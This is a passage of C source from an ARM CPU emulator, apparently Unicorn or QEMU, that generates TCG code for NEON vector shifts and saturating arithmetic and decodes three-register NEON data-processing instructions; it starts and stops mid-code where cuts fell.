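 * count has already been masked to 0..255, which is positive within the lane, so a
 * signed LT against 8 << vece is safe.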
*/ if (vece == MO_8) { tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GEU, vece, lsh, lsh, max); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GEU, vece, rsh, rsh, max); tcg_gen_andc_vec(tcg_ctx, vece, lval, lval, lsh); tcg_gen_andc_vec(tcg_ctx, vece, rval, rval, rsh); } else { tcg_gen_cmp_vec(tcg_ctx, TCG_COND_LT, vece, lsh, lsh, max); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_LT, vece, rsh, rsh, max); tcg_gen_and_vec(tcg_ctx, vece, lval, lval, lsh); tcg_gen_and_vec(tcg_ctx, vece, rval, rval, rsh); } tcg_gen_or_vec(tcg_ctx, vece, dst, lval, rval); tcg_temp_free_vec(tcg_ctx, max); tcg_temp_free_vec(tcg_ctx, lval); tcg_temp_free_vec(tcg_ctx, rval); tcg_temp_free_vec(tcg_ctx, lsh); tcg_temp_free_vec(tcg_ctx, rsh); } static const TCGOpcode ushl_list[] = { INDEX_op_neg_vec, INDEX_op_shlv_vec, INDEX_op_shrv_vec, INDEX_op_cmp_vec, 0 }; const GVecGen3 ushl_op[4] = { { .fniv = gen_ushl_vec, .fno = gen_helper_gvec_ushl_b, .opt_opc = ushl_list, .vece = MO_8 }, { .fniv = gen_ushl_vec, .fno = gen_helper_gvec_ushl_h, .opt_opc = ushl_list, .vece = MO_16 }, { .fni4 = gen_ushl_i32, .fniv = gen_ushl_vec, .opt_opc = ushl_list, .vece = MO_32 }, { .fni8 = gen_ushl_i64, .fniv = gen_ushl_vec, .opt_opc = ushl_list, .vece = MO_64 }, }; void gen_sshl_i32(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 src, TCGv_i32 shift) { TCGv_i32 lval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 lsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); TCGv_i32 max = tcg_const_i32(tcg_ctx, 31); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_ext8s_i32(tcg_ctx, lsh, shift); tcg_gen_neg_i32(tcg_ctx, rsh, lsh); tcg_gen_shl_i32(tcg_ctx, lval, src, lsh); tcg_gen_umin_i32(tcg_ctx, rsh, rsh, max); tcg_gen_sar_i32(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LEU, lval, lsh, max, lval, zero); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, dst, lsh, zero, rval, lval); tcg_temp_free_i32(tcg_ctx, lval); tcg_temp_free_i32(tcg_ctx, rval); tcg_temp_free_i32(tcg_ctx, lsh); tcg_temp_free_i32(tcg_ctx, rsh); tcg_temp_free_i32(tcg_ctx, zero); tcg_temp_free_i32(tcg_ctx, max); } void gen_sshl_i64(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, TCGv_i64 shift) { TCGv_i64 lval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 lsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); TCGv_i64 max = tcg_const_i64(tcg_ctx, 63); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. 
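 * Unlike the unsigned case, an out-of-range right shift must still produce the sign
 * fill, so rsh is clamped to 63 with umin below and only the left-shift result is
 * explicitly zeroed when lsh exceeds 63.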
*/ tcg_gen_ext8s_i64(tcg_ctx, lsh, shift); tcg_gen_neg_i64(tcg_ctx, rsh, lsh); tcg_gen_shl_i64(tcg_ctx, lval, src, lsh); tcg_gen_umin_i64(tcg_ctx, rsh, rsh, max); tcg_gen_sar_i64(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LEU, lval, lsh, max, lval, zero); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, dst, lsh, zero, rval, lval); tcg_temp_free_i64(tcg_ctx, lval); tcg_temp_free_i64(tcg_ctx, rval); tcg_temp_free_i64(tcg_ctx, lsh); tcg_temp_free_i64(tcg_ctx, rsh); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, max); } static void gen_sshl_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec dst, TCGv_vec src, TCGv_vec shift) { TCGv_vec lval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec lsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec tmp = tcg_temp_new_vec_matching(tcg_ctx, dst); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_neg_vec(tcg_ctx, vece, rsh, shift); if (vece == MO_8) { tcg_gen_mov_vec(tcg_ctx, lsh, shift); } else { tcg_gen_dupi_vec(tcg_ctx, vece, tmp, 0xff); tcg_gen_and_vec(tcg_ctx, vece, lsh, shift, tmp); tcg_gen_and_vec(tcg_ctx, vece, rsh, rsh, tmp); } /* Bound rsh so out of bound right shift gets -1. */ tcg_gen_dupi_vec(tcg_ctx, vece, tmp, (8 << vece) - 1); tcg_gen_umin_vec(tcg_ctx, vece, rsh, rsh, tmp); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GT, vece, tmp, lsh, tmp); tcg_gen_shlv_vec(tcg_ctx, vece, lval, src, lsh); tcg_gen_sarv_vec(tcg_ctx, vece, rval, src, rsh); /* Select in-bound left shift. */ tcg_gen_andc_vec(tcg_ctx, vece, lval, lval, tmp); /* Select between left and right shift. 
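 * For MO_8 the count byte is compared against 0 directly; for wider elements it was
 * masked to 8 bits, so "negative" counts are those >= 0x80 and the cmpsel below tests
 * lsh < 0x80 with its true/false operands swapped accordingly.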
*/ if (vece == MO_8) { tcg_gen_dupi_vec(tcg_ctx, vece, tmp, 0); tcg_gen_cmpsel_vec(tcg_ctx, TCG_COND_LT, vece, dst, lsh, tmp, rval, lval); } else { tcg_gen_dupi_vec(tcg_ctx, vece, tmp, 0x80); tcg_gen_cmpsel_vec(tcg_ctx, TCG_COND_LT, vece, dst, lsh, tmp, lval, rval); } tcg_temp_free_vec(tcg_ctx, lval); tcg_temp_free_vec(tcg_ctx, rval); tcg_temp_free_vec(tcg_ctx, lsh); tcg_temp_free_vec(tcg_ctx, rsh); tcg_temp_free_vec(tcg_ctx, tmp); } static const TCGOpcode sshl_list[] = { INDEX_op_neg_vec, INDEX_op_umin_vec, INDEX_op_shlv_vec, INDEX_op_sarv_vec, INDEX_op_cmp_vec, INDEX_op_cmpsel_vec, 0 }; const GVecGen3 sshl_op[4] = { { .fniv = gen_sshl_vec, .fno = gen_helper_gvec_sshl_b, .opt_opc = sshl_list, .vece = MO_8 }, { .fniv = gen_sshl_vec, .fno = gen_helper_gvec_sshl_h, .opt_opc = sshl_list, .vece = MO_16 }, { .fni4 = gen_sshl_i32, .fniv = gen_sshl_vec, .opt_opc = sshl_list, .vece = MO_32 }, { .fni8 = gen_sshl_i64, .fniv = gen_sshl_vec, .opt_opc = sshl_list, .vece = MO_64 }, }; static void gen_uqadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_add_vec(tcg_ctx, vece, x, a, b); tcg_gen_usadd_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_uqadd[] = { INDEX_op_usadd_vec, INDEX_op_cmp_vec, INDEX_op_add_vec, 0 }; const GVecGen4 uqadd_op[4] = { { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_b, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_8 }, { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_h, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_16 }, { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_s, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_32 }, { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_d, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_64 }, }; static void gen_sqadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_add_vec(tcg_ctx, vece, x, a, b); tcg_gen_ssadd_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_sqadd[] = { INDEX_op_ssadd_vec, INDEX_op_cmp_vec, INDEX_op_add_vec, 0 }; const GVecGen4 sqadd_op[4] = { { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_b, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_8 }, { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_h, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_16 }, { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_s, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_32 }, { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_d, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_64 }, }; static void gen_uqsub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_sub_vec(tcg_ctx, vece, x, a, b); tcg_gen_ussub_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_uqsub[] = { INDEX_op_ussub_vec, INDEX_op_cmp_vec, INDEX_op_sub_vec, 0 }; const GVecGen4 uqsub_op[4] = { { .fniv = 
gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_b, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_8 }, { .fniv = gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_h, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_16 }, { .fniv = gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_s, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_32 }, { .fniv = gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_d, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_64 }, }; static void gen_sqsub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_sub_vec(tcg_ctx, vece, x, a, b); tcg_gen_sssub_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_sqsub[] = { INDEX_op_sssub_vec, INDEX_op_cmp_vec, INDEX_op_sub_vec, 0 }; const GVecGen4 sqsub_op[4] = { { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_b, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_8 }, { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_h, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_16 }, { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_s, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_32 }, { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_d, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_64 }, }; /* Translate a NEON data processing instruction. Return nonzero if the instruction is invalid. We process data in a mixture of 32-bit and 64-bit chunks. Mostly we use 32-bit chunks so we can use normal scalar instructions. */ static int disas_neon_data_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op; int q; int rd, rn, rm, rd_ofs, rn_ofs, rm_ofs; int size; int shift; int pass; int count; int pairwise; int u; int vec_size; uint32_t imm; TCGv_i32 tmp, tmp2, tmp3, tmp4, tmp5; TCGv_ptr ptr1, ptr2, ptr3; TCGv_i64 tmp64; /* FIXME: this access check should not take precedence over UNDEF * for invalid encodings; we will generate incorrect syndrome information * for attempts to execute invalid vfp/neon encodings with FP disabled. */ if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) return 1; q = (insn & (1 << 6)) != 0; u = (insn >> 24) & 1; VFP_DREG_D(rd, insn); VFP_DREG_N(rn, insn); VFP_DREG_M(rm, insn); size = (insn >> 20) & 3; vec_size = q ? 16 : 8; rd_ofs = neon_reg_offset(rd, 0); rn_ofs = neon_reg_offset(rn, 0); rm_ofs = neon_reg_offset(rm, 0); if ((insn & (1 << 23)) == 0) { /* Three register same length. */ op = ((insn >> 7) & 0x1e) | ((insn >> 4) & 1); /* Catch invalid op and bad size combinations: UNDEF */ if ((neon_3r_sizes[op] & (1 << size)) == 0) { return 1; } /* All insns of this form UNDEF for either this condition or the * superset of cases "Q==1"; we catch the latter later. */ if (q && ((rd | rn | rm) & 1)) { return 1; } switch (op) { case NEON_3R_SHA: /* The SHA-1/SHA-256 3-register instructions require special * treatment here, as their size field is overloaded as an * op type selector, and they all consume their input in a * single pass. 
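 * For SHA-1 (u == 0) the size value is handed to the helper as-is to pick among
 * SHA1C/SHA1P/SHA1M/SHA1SU0; for SHA-256 (u == 1) sizes 0..2 select SHA256H,
 * SHA256H2 and SHA256SU1, and size == 3 UNDEFs.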
*/ if (!q) { return 1; } if (!u) { /* SHA-1 */ if (!dc_isar_feature(aa32_sha1, s)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rn); ptr3 = vfp_reg_ptr(tcg_ctx, true, rm); tmp4 = tcg_const_i32(tcg_ctx, size); gen_helper_crypto_sha1_3reg(tcg_ctx, ptr1, ptr2, ptr3, tmp4); tcg_temp_free_i32(tcg_ctx, tmp4); } else { /* SHA-256 */ if (!dc_isar_feature(aa32_sha2, s) || size == 3) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rn); ptr3 = vfp_reg_ptr(tcg_ctx, true, rm); switch (size) { case 0: gen_helper_crypto_sha256h(tcg_ctx, ptr1, ptr2, ptr3); break; case 1: gen_helper_crypto_sha256h2(tcg_ctx, ptr1, ptr2, ptr3); break; case 2: gen_helper_crypto_sha256su1(tcg_ctx, ptr1, ptr2, ptr3); break; } } tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); tcg_temp_free_ptr(tcg_ctx, ptr3); return 0; case NEON_3R_VPADD_VQRDMLAH: if (!u) { break; /* VPADD */ } /* VQRDMLAH */ switch (size) { case 1: return do_v81_helper(s, gen_helper_gvec_qrdmlah_s16, q, rd, rn, rm); case 2: return do_v81_helper(s, gen_helper_gvec_qrdmlah_s32, q, rd, rn, rm); } return 1; case NEON_3R_VFM_VQRDMLSH: if (!u) { /* VFM, VFMS */ if (size == 1) { return 1; } break; } /* VQRDMLSH */ switch (size) { case 1: return do_v81_helper(s, gen_helper_gvec_qrdmlsh_s16, q, rd, rn, rm); case 2: return do_v81_helper(s, gen_helper_gvec_qrdmlsh_s32, q, rd, rn, rm); } return 1; case NEON_3R_LOGIC: /* Logic ops. */ switch ((u << 2) | size) { case 0: /* VAND */ tcg_gen_gvec_and(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 1: /* VBIC */ tcg_gen_gvec_andc(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 2: /* VORR */ tcg_gen_gvec_or(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 3: /* VORN */ tcg_gen_gvec_orc(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 4: /* VEOR */ tcg_gen_gvec_xor(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 5: /* VBSL */ tcg_gen_gvec_bitsel(tcg_ctx, MO_8, rd_ofs, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 6: /* VBIT */ tcg_gen_gvec_bitsel(tcg_ctx, MO_8, rd_ofs, rm_ofs, rn_ofs, rd_ofs, vec_size, vec_size); break; case 7: /* VBIF */ tcg_gen_gvec_bitsel(tcg_ctx, MO_8, rd_ofs, rm_ofs, rd_ofs, rn_ofs, vec_size, vec_size); break; } return 0; case NEON_3R_VADD_VSUB: if (u) { tcg_gen_gvec_sub(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { tcg_gen_gvec_add(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VQADD: tcg_gen_gvec_4(tcg_ctx, rd_ofs, offsetof(CPUARMState, vfp.qc), rn_ofs, rm_ofs, vec_size, vec_size, (u ? uqadd_op : sqadd_op) + size); return 0; case NEON_3R_VQSUB: tcg_gen_gvec_4(tcg_ctx, rd_ofs, offsetof(CPUARMState, vfp.qc), rn_ofs, rm_ofs, vec_size, vec_size, (u ? uqsub_op : sqsub_op) + size); return 0; case NEON_3R_VMUL: /* VMUL */ if (u) { /* Polynomial case allows only P8. */ if (size != 0) { return 1; } tcg_gen_gvec_3_ool(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size, 0, gen_helper_gvec_pmul_b); } else { tcg_gen_gvec_mul(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VML: /* VMLA, VMLS */ tcg_gen_gvec_3(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size, u ? 
&mls_op[size] : &mla_op[size]); return 0; case NEON_3R_VTST_VCEQ: if (u) { /* VCEQ */ tcg_gen_gvec_cmp(tcg_ctx, TCG_COND_EQ, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { /* VTST */ tcg_gen_gvec_3(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size, &cmtst_op[size]); } return 0; case NEON_3R_VCGT: tcg_gen_gvec_cmp(tcg_ctx, u ? TCG_COND_GTU : TCG_COND_GT, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); return 0; case NEON_3R_VCGE: tcg_gen_gvec_cmp(tcg_ctx, u ? TCG_COND_GEU : TCG_COND_GE, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); return 0; case NEON_3R_VMAX: if (u) { tcg_gen_gvec_umax(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { tcg_gen_gvec_smax(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VMIN: if (u) { tcg_gen_gvec_umin(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { tcg_gen_gvec_smin(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VSHL: /* Note the operation is vshl vd,vm,vn */ tcg_gen_gvec_3(tcg_ctx, rd_ofs, rm_ofs, rn_ofs, vec_size, vec_size, u ? &ushl_op[size] : &sshl_op[size]); return 0; } if (size == 3) { /* 64-bit element instructions. */ for (pass = 0; pass < (q ? 2 : 1); pass++) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); switch (op) { case NEON_3R_VQSHL: if (u) { gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } else { gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } break; case NEON_3R_VRSHL: if (u) { gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } else { gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } break; case NEON_3R_VQRSHL: if (u) { gen_helper_neon_qrshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } else { gen_helper_neon_qrshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } break; default: abort(); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } return 0; } pairwise = 0; switch (op) { case NEON_3R_VQSHL: case NEON_3R_VRSHL: case NEON_3R_VQRSHL: { int rtmp; /* Shift instruction operands are reversed. */ rtmp = rn; rn = rm; rm = rtmp; } break; case NEON_3R_VPADD_VQRDMLAH: case NEON_3R_VPMAX: case NEON_3R_VPMIN: pairwise = 1; break; case NEON_3R_FLOAT_ARITH: pairwise = (u && size < 2); /* if VPADD (float) */ break; case NEON_3R_FLOAT_MINMAX: pairwise = u; /* if VPMIN/VPMAX (float) */ break; case NEON_3R_FLOAT_CMP: if (!u && size) { /* no encoding for U=0 C=1x */ return 1; } break; case NEON_3R_FLOAT_ACMP: if (!u) { return 1; } break; case NEON_3R_FLOAT_MISC: /* VMAXNM/VMINNM in ARMv8 */ if (u && !arm_dc_feature(s, ARM_FEATURE_V8)) { return 1; } break; case NEON_3R_VFM_VQRDMLSH: if (!dc_isar_feature(aa32_simdfmac, s)) { return 1; } break; default: break; } if (pairwise && q) { /* All the pairwise insns UNDEF if Q is set */ return 1; } for (pass = 0; pass < (q ? 4 : 2); pass++) { if (pairwise) { /* Pairwise. */ if (pass < 1) { tmp = neon_load_reg(tcg_ctx, rn, 0); tmp2 = neon_load_reg(tcg_ctx, rn, 1); } else { tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); } } else { /* Elementwise. 
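 * (Pairwise passes read both 32-bit halves of rn and then of rm, as above;
 * elementwise passes read the matching 32-bit chunk of each source register.)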
*/ tmp = neon_load_reg(tcg_ctx, rn, pass); tmp2 = neon_load_reg(tcg_ctx, rm, pass); } switch (op) { case NEON_3R_VHADD: GEN_NEON_INTEGER_OP(hadd); break; case NEON_3R_VRHADD: GEN_NEON_INTEGER_OP(rhadd); break; case NEON_3R_VHSUB: GEN_NEON_INTEGER_OP(hsub); break; case NEON_3R_VQSHL: GEN_NEON_INTEGER_OP_ENV(qshl); break; case NEON_3R_VRSHL: GEN_NEON_INTEGER_OP(rshl); break; case NEON_3R_VQRSHL: GEN_NEON_INTEGER_OP_ENV(qrshl); break; case NEON_3R_VABD: GEN_NEON_INTEGER_OP(abd); break; case NEON_3R_VABA: GEN_NEON_INTEGER_OP(abd); tcg_temp_free_i32(tcg_ctx, tmp2); tmp2 = neon_load_reg(tcg_ctx, rd, pass); gen_neon_add(tcg_ctx, size, tmp, tmp2); break; case NEON_3R_VPMAX: GEN_NEON_INTEGER_OP(pmax); break; case NEON_3R_VPMIN: GEN_NEON_INTEGER_OP(pmin); break; case NEON_3R_VQDMULH_VQRDMULH: /* Multiply high. */ if (!u) { /* VQDMULH */ switch (size) { case 1: gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 2: gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; default: abort(); } } else { /* VQRDMULH */ switch (size) { case 1: gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 2: gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; default: abort(); } } break; case NEON_3R_VPADD_VQRDMLAH: switch (size) { case 0: gen_helper_neon_padd_u8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_padd_u16(tcg_ctx, tmp, tmp, tmp2); break; case 2: tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } break; case NEON_3R_FLOAT_ARITH: /* Floating point arithmetic. */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); switch ((u << 2) | size) { case 0: /* VADD */ case 4: /* VPADD */ gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); break; case 2: /* VSUB */ gen_helper_vfp_subs(tcg_ctx, tmp, tmp, tmp2, fpstatus); break; case 6: /* VABD */ gen_helper_neon_abd_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); break; default: abort(); } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_MULTIPLY: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); if (!u) { tcg_temp_free_i32(tcg_ctx, tmp2); tmp2 = neon_load_reg(tcg_ctx, rd, pass); if (size == 0) { gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); } } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_CMP: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (!u) { gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { if (size == 0) { gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_ACMP: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (size == 0) { gen_helper_neon_acge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_neon_acgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_MINMAX: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (size == 0) { gen_helper_vfp_maxs(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_vfp_mins(tcg_ctx, tmp, tmp, tmp2, fpstatus); } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_MISC: if (u) { /* VMAXNM/VMINNM */ TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (size == 0) { gen_helper_vfp_maxnums(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_vfp_minnums(tcg_ctx, tmp, 
tmp, tmp2, fpstatus); } tcg_temp_free_ptr(tcg_ctx, fpstatus); } else { if (size == 0) { gen_helper_recps_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); } else { gen_helper_rsqrts_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); } } break; case NEON_3R_VFM_VQRDMLSH: { /* VFMA, VFMS: fused multiply-add */ TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); TCGv_i32 tmp3 = neon_load_reg(tcg_ctx, rd, pass); if (size) { /* VFMS */ gen_helper_vfp_negs(tcg_ctx, tmp, tmp); } gen_helper_vfp_muladds(tcg_ctx, tmp, tmp, tmp2, tmp3, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp3); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); /* Save the result. For elementwise operations we can put it straight into the destination register. For pairwise operations we have to be careful to avoid clobbering the source operands. */ if (pairwise && rd == rm) { neon_store_scratch(tcg_ctx, pass, tmp); } else { neon_store_reg(tcg_ctx, rd, pass, tmp); } } /* for pass */ if (pairwise && rd == rm) { for (pass = 0; pass < (q ? 4 : 2); pass++) { tmp = neon_load_scratch(tcg_ctx, pass); neon_store_reg(tcg_ctx, rd, pass, tmp); } } /* End of 3 register same size operations. */ } else if (insn & (1 